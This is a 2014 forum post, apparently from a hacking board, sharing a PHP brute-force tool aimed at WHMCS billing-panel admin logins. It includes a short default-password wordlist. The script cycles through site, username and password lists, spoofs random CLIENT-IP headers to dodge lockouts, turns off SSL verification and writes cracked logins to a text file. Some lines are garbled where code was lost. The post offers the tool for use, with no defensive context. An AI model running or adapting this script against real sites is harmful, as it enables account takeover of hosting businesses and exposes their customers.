sQuo Posted March 1, 2014 Share Posted March 1, 2014 [LENGUAJE=php] ##whmcs brut by g-b update by hamza killer## This is the hidden content, please Sign In or Sign Up admindemoadmin123admin123456password10203012312312345123456789passtestadmin123demo!@#$%^ */* whmcs brut force by g-b update by hamza killer changed to browser can add list site and user and pass on textarea 2014--*/ set_time_limit(0); error_reporting(0); @apache_setenv('no-gzip', 1); @ini_set('zlib.output_compression', 0); @ini_set('implicit_flush', 1); for($i=0;$i$user,'password'=>$pass,'rememberme'=>'on'); $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"$url/dologin.php"); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,false); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,false); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_HTTPHEADER,array("CLIENT-IP: $ip")); curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; rv:17.0) Gecko/20100101 Firefox/17.0'); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$post); curl_setopt($ch,CURLOPT_HEADER,true); curl_setopt($ch,CURLOPT_REFERER,"$url/login.php"); $return = curl_exec($ch); curl_close($ch); //echo $return; if(preg_match('/Location\: index\.php/',$return)){ return true; }else{ return false; }}if($_POST['start']){$fp=fopen("hamza-whmcs.txt","a+"); foreach(explode("\n",$_POST['site']) as $site){ $site=trim($site);foreach(explode("\n",$_POST['user']) as $user){ $user = trim($user); foreach(explode("\n",$_POST['pass']) as $pass){ $pass = trim($pass); echo "Try $site :: $user :: $pass "; while (true) { $ip = long2ip(rand(11111,99999999999)); if(!@in_array($ip,$ips)&&check_ip($ip)){ $ips[] = $ip; break; } } if(login($site,$user,$pass)){ echo "[+] $site [+]user : $user. password:$pass\n "; fwrite($fp,"Target : $site\r\nUsername : $user\r\nPassword : $pass\r\n===================================\r\n"); break; }else{ echo "Error.\n"; } }}} }?>[/LENGUAJE] Link to comment Share on other sites More sharing options...
Recommended Posts